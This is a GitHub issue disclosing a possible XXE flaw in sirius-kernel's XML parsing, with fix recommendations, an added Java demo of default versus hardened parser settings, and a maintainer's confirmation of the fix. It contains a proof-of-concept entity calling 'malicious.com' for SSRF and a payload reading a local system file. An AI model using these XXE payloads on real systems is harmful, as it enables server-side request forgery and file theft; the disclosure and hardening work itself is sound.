Potential XXE(XML External Entity injection) vulnerability in XMLStructuredInput.java #536

Closed
JAckLosingHeart opened this issue Oct 19, 2024 · 1 comment

Comments

@JAckLosingHeart

Hi team, there might be a potential XXE vulnerability, but I'm not sure whether it's an actual risk or not; I'm just creating an issue here for you to check.
On https://github.com/scireum/sirius-kernel/blob/develop/src/main/java/sirius/kernel/xml/XMLStructuredInput.java#L38
in the function XMLStructuredInput()

an external XML is parsed with DocumentBuilder without security settings enabled:

```java
DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();

if (namespaceContext != null) {
    factory.setNamespaceAware(true);
}
DocumentBuilder builder = factory.newDocumentBuilder();
Document document = builder.parse(inputStream);
```

An malicious XML as input could be used to exploit the vulnerability. For example they could craft a poc.xml like this:

<?xml version="1.0" encoding="UTF-8"?> 
<!DOCTYPE root [<!ENTITY xxe SYSTEM "https://malicious.com/exploit">]> 
<root>&xxe;</root>

to trigger a SSRF

Attackers can also exploit this vulnerability to access sensitive files on the system, overload the system with malicious XML payloads and so on.

The fix recommendation would be to use the following calls to disable DTDs or external entities:

```java
factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
```

Or

```java
factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
```
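
Added example, not from the issue report and not sirius-kernel code: the parsing pattern quoted in the report next to a hardened DocumentBuilderFactory, both run against a constructed payload that declares an internal entity and a SYSTEM entity. The class name XxeDemo, the helper method names and the file:///etc/hostname path are assumptions chosen for the demonstration. With the default factory the DOCTYPE is processed and the entities are expanded (the SYSTEM entity reads the local file, or fails with an I/O error if the file does not exist); with the hardened factory the document is rejected at the DOCTYPE, before any entity can be resolved.

```java
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.w3c.dom.Document;
import org.xml.sax.SAXParseException;

/**
 * Added demonstration class (hypothetical name, not part of sirius-kernel).
 * Compares the reported parsing pattern with a hardened factory.
 */
public class XxeDemo {

    // Constructed sample payload: an internal entity (expands without any I/O)
    // and an external SYSTEM entity (causes file or network access when resolved).
    // The file path is an assumption; a real payload would target a secret file
    // or an internal HTTP endpoint (SSRF).
    static final String PAYLOAD =
            "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n"
          + "<!DOCTYPE root [\n"
          + "  <!ENTITY internal \"expanded-by-parser\">\n"
          + "  <!ENTITY xxe SYSTEM \"file:///etc/hostname\">\n"
          + "]>\n"
          + "<root><a>&internal;</a><b>&xxe;</b></root>";

    // Mirrors the reported code: default factory, DTD processing left enabled.
    static DocumentBuilderFactory vulnerableFactory() {
        DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
        factory.setNamespaceAware(true);
        return factory;
    }

    // Hardened factory. Rejecting the DOCTYPE is the decisive control: entities
    // can only be declared inside a DTD, so a document without one cannot
    // reference external resources. The remaining settings are defence in depth
    // for parsers where a DOCTYPE must be tolerated.
    static DocumentBuilderFactory hardenedFactory() throws ParserConfigurationException {
        DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
        factory.setNamespaceAware(true);
        factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
        factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        factory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        factory.setXIncludeAware(false);
        factory.setExpandEntityReferences(false);
        return factory;
    }

    // Parses the XML with the given factory and reports what happened.
    static String parseAndDescribe(DocumentBuilderFactory factory, String xml) {
        try {
            DocumentBuilder builder = factory.newDocumentBuilder();
            Document doc = builder.parse(
                    new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)));
            // Reaching this point means the DOCTYPE was processed; show the
            // text the entity references expanded to.
            String a = doc.getElementsByTagName("a").item(0).getTextContent();
            String b = doc.getElementsByTagName("b").item(0).getTextContent();
            return "parsed: a=\"" + a + "\" b=\"" + b + "\"";
        } catch (SAXParseException e) {
            // The hardened factory ends up here: the DOCTYPE itself is refused,
            // so no entity is ever resolved.
            return "rejected: " + e.getMessage();
        } catch (Exception e) {
            // For example an IOException from the vulnerable factory when the
            // SYSTEM entity points at a file that does not exist.
            return "error: " + e;
        }
    }

    public static void main(String[] args) throws Exception {
        System.out.println("default factory  -> " + parseAndDescribe(vulnerableFactory(), PAYLOAD));
        System.out.println("hardened factory -> " + parseAndDescribe(hardenedFactory(), PAYLOAD));
    }
}
```

Compile and run with `javac XxeDemo.java && java XxeDemo`. One practical check: `setFeature` throws `ParserConfigurationException` for a feature URI the underlying parser does not recognise, so a hardening line that does not apply fails loudly at startup instead of silently leaving DTD processing enabled; the URIs above are the ones implemented by Xerces and the JDK's built-in parser.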

@ymo-sci (Contributor) commented Dec 10, 2024

Hi @JAckLosingHeart - thanks for your report.
We checked it and also checked other possible vulnerable implementations.

Fix is available in #543 and also scireum/sirius-web#1488
If you have any comments or see ongoing issues, feel free to contact us again.

@ymo-sci ymo-sci closed this as completed Dec 16, 2024